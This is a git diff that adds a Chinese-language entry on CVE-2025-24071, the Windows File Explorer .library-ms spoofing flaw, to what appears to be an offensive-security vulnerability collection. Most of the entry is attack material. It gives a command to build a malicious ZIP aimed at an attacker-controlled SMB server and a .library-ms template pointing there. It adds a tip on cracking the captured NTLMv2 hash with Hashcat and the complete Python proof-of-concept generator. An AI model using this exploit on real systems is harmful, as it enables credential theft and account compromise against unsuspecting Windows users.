diff --git a/README.md b/README.md index a1e5abe..d0deae0 100644 --- a/README.md +++ b/README.md @@ -894,6 +894,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito * Windows SMB 远程代码执行漏洞 CVE-2020-0796 * Windows Win32k 内核提权漏洞 CVE-2022-21882 * Windows Win32k 本地提权漏洞 CVE-2021-1732 + * Windows 文件资源管理器欺骗漏洞 CVE-2025-24071 * Windows 远程桌面服务漏洞 CVE-2019-0708 - 数据库漏洞 diff --git a/操作系统漏洞/Windows 文件资源管理器欺骗漏洞 CVE-2025-24071.md b/操作系统漏洞/Windows 文件资源管理器欺骗漏洞 CVE-2025-24071.md new file mode 100644 index 0000000..f0d91a3 --- /dev/null +++ b/操作系统漏洞/Windows 文件资源管理器欺骗漏洞 CVE-2025-24071.md @@ -0,0 +1,250 @@ +# Windows 文件资源管理器欺骗漏洞 CVE-2025-24071 + +## 漏洞描述 + +CVE-2025-24071 是 Windows 文件资源管理器中的一个欺骗漏洞,利用了 Windows 对 `.library-ms` 文件的隐式信任和自动解析特性。攻击者通过构造包含恶意 SMB 路径的 `.library-ms` 文件并打包为 ZIP/RAR 文件,解压时,Windows 资源管理器会自动尝试连接到指定的 SMB 服务器,从而泄露用户的 NTLM Hash。 + +参考链接: + +- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24071 +- https://cti.monster/blog/2025/03/18/CVE-2025-24071.html +- https://github.com/0x6rss/CVE-2025-24071_PoC +- https://github.com/ThemeHackers/CVE-2025-24071 + +## 漏洞影响 + +``` +Windows 10 Version 1809 for x64-based Systems +Windows 10 Version 1809 for 32-bit Systems +Windows Server 2025 (Server Core installation) +Windows Server 2025 +Windows Server 2012 R2 (Server Core installation) +Windows Server 2012 R2 +Windows Server 2016 (Server Core installation) +Windows Server 2016 +Windows 10 Version 1607 for x64-based Systems +Windows 10 Version 1607 for 32-bit Systems +Windows 10 for x64-based Systems +Windows 10 for 32-bit Systems +Windows 11 Version 24H2 for x64-based Systems +Windows 11 Version 24H2 for ARM64-based Systems +Windows Server 2022, 23H2 Edition (Server Core installation) +Windows 11 Version 23H2 for x64-based Systems +Windows 11 Version 23H2 for ARM64-based Systems +Windows 10 Version 22H2 for 32-bit Systems +Windows 10 Version 22H2 for ARM64-based Systems +Windows 10 Version 22H2 for x64-based Systems +Windows 11 Version 22H2 for x64-based Systems +Windows 11 Version 22H2 for ARM64-based Systems +Windows 10 Version 21H2 for x64-based Systems +Windows 10 Version 21H2 for ARM64-based Systems +Windows 10 Version 21H2 for 32-bit Systems +Windows Server 2022 (Server Core installation) +Windows Server 2022 +Windows Server 2019 (Server Core installation) +``` + +## 环境搭建 + +搭建一个未安装补丁的 Windows 11 Version 23H2 漏洞环境: + +> 可以按 `Win+R` 键,输入 `winver` ,然后按 `Enter` 键查看 Windows 操作系统的版本号。 + +![](images/Windows%20文件资源管理器欺骗漏洞%20CVE-2025-24071/image-20250618162450594.png) + +## 漏洞复现 + +通过 [该项目](https://github.com/ThemeHackers/CVE-2025-24071) 构造一个恶意压缩包 `exploit.zip`,压缩包中包含一个名为 `document.library-ms` 的恶意文件: + +``` +python exploit.py -f document -i 192.168.174.2 +``` + +![](images/Windows%20文件资源管理器欺骗漏洞%20CVE-2025-24071/image-20250618163225289.png) + +构造的恶意文件 `document.library-ms` 中包含一个 `` 标签,标签直接指向攻击者控制的 SMB 服务器: + +``` + + + + + + \\192.168.174.2\shared + + + + +``` + +由于 Windows 资源管理器隐式信任 `.library-ms` 文件,提取后,Windows 资源管理器会尝试自动解析 SMB 路径 `\\192.168.174.2\shared`,以收集元数据和索引文件信息,此操作将触发从受害者系统到攻击者控制的 SMB 服务器的隐式 NTLM 身份验证握手。攻击者控制的 SMB 服务器接收到 NTLMv2 Hash: + +![](images/Windows%20文件资源管理器欺骗漏洞%20CVE-2025-24071/image-20250618163632193.png) + +攻击者可以使用 Hashcat 对 NTLMv2 Hash 进行破解(`-m 5600`)。 + +## 漏洞 POC + +```python +import os +import zipfile +import argparse +import time +import sys +import itertools +from colorama import init, Fore, Style + +init() + +def loading_animation(duration): + """Display a simple loading animation for specified duration""" + spinner = itertools.cycle(['-', '/', '|', '\\']) + end_time = time.time() + duration + while time.time() < end_time: + sys.stdout.write(f'\r{Fore.YELLOW}Processing {next(spinner)}{Style.RESET_ALL}') + sys.stdout.flush() + time.sleep(0.1) + sys.stdout.write('\r') + +def print_ascii_art(): + """Print ASCII art banner""" + art = r""" + ______ ____ ____ _______ ___ ___ ___ _____ ___ _ _ ___ ______ __ + / |\ \ / / | ____| |__ \ / _ \ |__ \ | ____| |__ \ | || | / _ \ |____ | /_ | + | ,----' \ \/ / | |__ ______ ) | | | | | ) | | |__ ______ ) | | || |_ | | | | / / | | + | | \ / | __| |______/ / | | | | / / |___ \ |______/ / |__ _| | | | | / / | | + | `----. \ / | |____ / /_ | |_| | / /_ ___) | / /_ | | | |_| | / / | | + \______| \__/ |_______| |____| \___/ |____| |____/ |____| |_| \___/ /_/ |_| + + + Windows File Explorer Spoofing Vulnerability (CVE-2025-24071) + by ThemeHackers + """ + print(f"{Fore.CYAN}{art}{Style.RESET_ALL}") + +def show_affected_versions(): + """Display list of affected versions""" + affected_versions = [ + "Windows 10 Version 1809 for x64-based Systems", + "Windows 10 Version 1809 for 32-bit Systems", + "Windows Server 2025 (Server Core installation)", + "Windows Server 2025", + "Windows Server 2012 R2 (Server Core installation)", + "Windows Server 2012 R2", + "Windows Server 2016 (Server Core installation)", + "Windows Server 2016", + "Windows 10 Version 1607 for x64-based Systems", + "Windows 10 Version 1607 for 32-bit Systems", + "Windows 10 for x64-based Systems", + "Windows 10 for 32-bit Systems", + "Windows 11 Version 24H2 for x64-based Systems", + "Windows 11 Version 24H2 for ARM64-based Systems", + "Windows Server 2022, 23H2 Edition (Server Core installation)", + "Windows 11 Version 23H2 for x64-based Systems", + "Windows 11 Version 23H2 for ARM64-based Systems", + "Windows 10 Version 22H2 for 32-bit Systems", + "Windows 10 Version 22H2 for ARM64-based Systems", + "Windows 10 Version 22H2 for x64-based Systems", + "Windows 11 Version 22H2 for x64-based Systems", + "Windows 11 Version 22H2 for ARM64-based Systems", + "Windows 10 Version 21H2 for x64-based Systems", + "Windows 10 Version 21H2 for ARM64-based Systems", + "Windows 10 Version 21H2 for 32-bit Systems", + "Windows Server 2022 (Server Core installation)", + "Windows Server 2022", + "Windows Server 2019 (Server Core installation)", + "Windows Server 2019" + ] + print(f"{Fore.GREEN}Affected versions:{Style.RESET_ALL}") + for version in affected_versions: + print(f"- {version}") + +def create_exploit(file_name, ip_address): + print_ascii_art() + print(f"{Fore.GREEN}Creating exploit with filename: {file_name}.library-ms{Style.RESET_ALL}") + print(f"{Fore.GREEN}Target IP: {ip_address}{Style.RESET_ALL}\n") + + library_content = f""" + + + + + \\\\{ip_address}\\shared + + + +""" + + library_filename = f"{file_name}.library-ms" + + print(f"{Fore.BLUE}Generating library file...{Style.RESET_ALL}") + loading_animation(1.5) + try: + with open(library_filename, 'w', encoding='utf-8') as f: + f.write(library_content) + print(f"{Fore.GREEN}✓ Library file created successfully{Style.RESET_ALL}") + except IOError as e: + print(f"{Fore.RED}✗ Error writing file: {e}{Style.RESET_ALL}") + return + + print(f"\n{Fore.BLUE}Creating ZIP archive...{Style.RESET_ALL}") + loading_animation(1.5) + try: + with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zipf: + zipf.write(library_filename) + print(f"{Fore.GREEN}✓ ZIP file created successfully{Style.RESET_ALL}") + except IOError as e: + print(f"{Fore.RED}✗ Error creating ZIP file: {e}{Style.RESET_ALL}") + return + + print(f"\n{Fore.BLUE}Cleaning up temporary files...{Style.RESET_ALL}") + loading_animation(1.0) + try: + if os.path.exists(library_filename): + os.remove(library_filename) + print(f"{Fore.GREEN}✓ Cleanup completed{Style.RESET_ALL}") + except OSError: + print(f"{Fore.RED}✗ Warning: Could not delete {library_filename}{Style.RESET_ALL}") + + print(f"\n{Fore.GREEN}Process completed successfully!{Style.RESET_ALL}") + print(f"Output file: {Fore.YELLOW}exploit.zip{Style.RESET_ALL}") + print(f"Run this file on the victim machine and you will see the effects of the vulnerability such as using ftp smb to send files etc.") +if __name__ == "__main__": + + parser = argparse.ArgumentParser(description='Create an exploit ZIP file or show affected versions') + parser.add_argument('-f', '--file-name', + help='Name of the library file (without extension)') + parser.add_argument('-i', '--ip-address', + help='IP address (e.g., 192.168.1.111)') + parser.add_argument('-afv', '--affected-versions', action='store_true', + help='Display affected versions') + + args = parser.parse_args() + + + if not (args.file_name or args.ip_address or args.affected_versions): + print(f"{Fore.RED}✗ Error: No arguments provided{Style.RESET_ALL}") + parser.print_help() + + elif args.affected_versions: + show_affected_versions() + + if args.file_name and args.ip_address: + print(f"\n{Fore.YELLOW}Proceeding with exploit creation...{Style.RESET_ALL}") + create_exploit(args.file_name, args.ip_address) + + elif args.file_name or args.ip_address: + print(f"\n{Fore.RED}✗ Error: Both --file-name and --ip-address are required for exploit creation{Style.RESET_ALL}") + + + else: + if args.file_name and args.ip_address: + create_exploit(args.file_name, args.ip_address) + else: + print(f"{Fore.RED}✗ Error: Both --file-name and --ip-address are required{Style.RESET_ALL}") + parser.print_help() +``` + +## 漏洞修复 + +- 微软已发布安全补丁,链接: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24071 diff --git a/操作系统漏洞/images/Windows 文件资源管理器欺骗漏洞 CVE-2025-24071/image-20250618162450594.png b/操作系统漏洞/images/Windows 文件资源管理器欺骗漏洞 CVE-2025-24071/image-20250618162450594.png new file mode 100644 index 0000000..d04684e Binary files /dev/null and b/操作系统漏洞/images/Windows 文件资源管理器欺骗漏洞 CVE-2025-24071/image-20250618162450594.png differ diff --git a/操作系统漏洞/images/Windows 文件资源管理器欺骗漏洞 CVE-2025-24071/image-20250618163225289.png b/操作系统漏洞/images/Windows 文件资源管理器欺骗漏洞 CVE-2025-24071/image-20250618163225289.png new file mode 100644 index 0000000..1709a50 Binary files /dev/null and b/操作系统漏洞/images/Windows 文件资源管理器欺骗漏洞 CVE-2025-24071/image-20250618163225289.png differ diff --git a/操作系统漏洞/images/Windows 文件资源管理器欺骗漏洞 CVE-2025-24071/image-20250618163632193.png b/操作系统漏洞/images/Windows 文件资源管理器欺骗漏洞 CVE-2025-24071/image-20250618163632193.png new file mode 100644 index 0000000..cc15487 Binary files /dev/null and b/操作系统漏洞/images/Windows 文件资源管理器欺骗漏洞 CVE-2025-24071/image-20250618163632193.png differ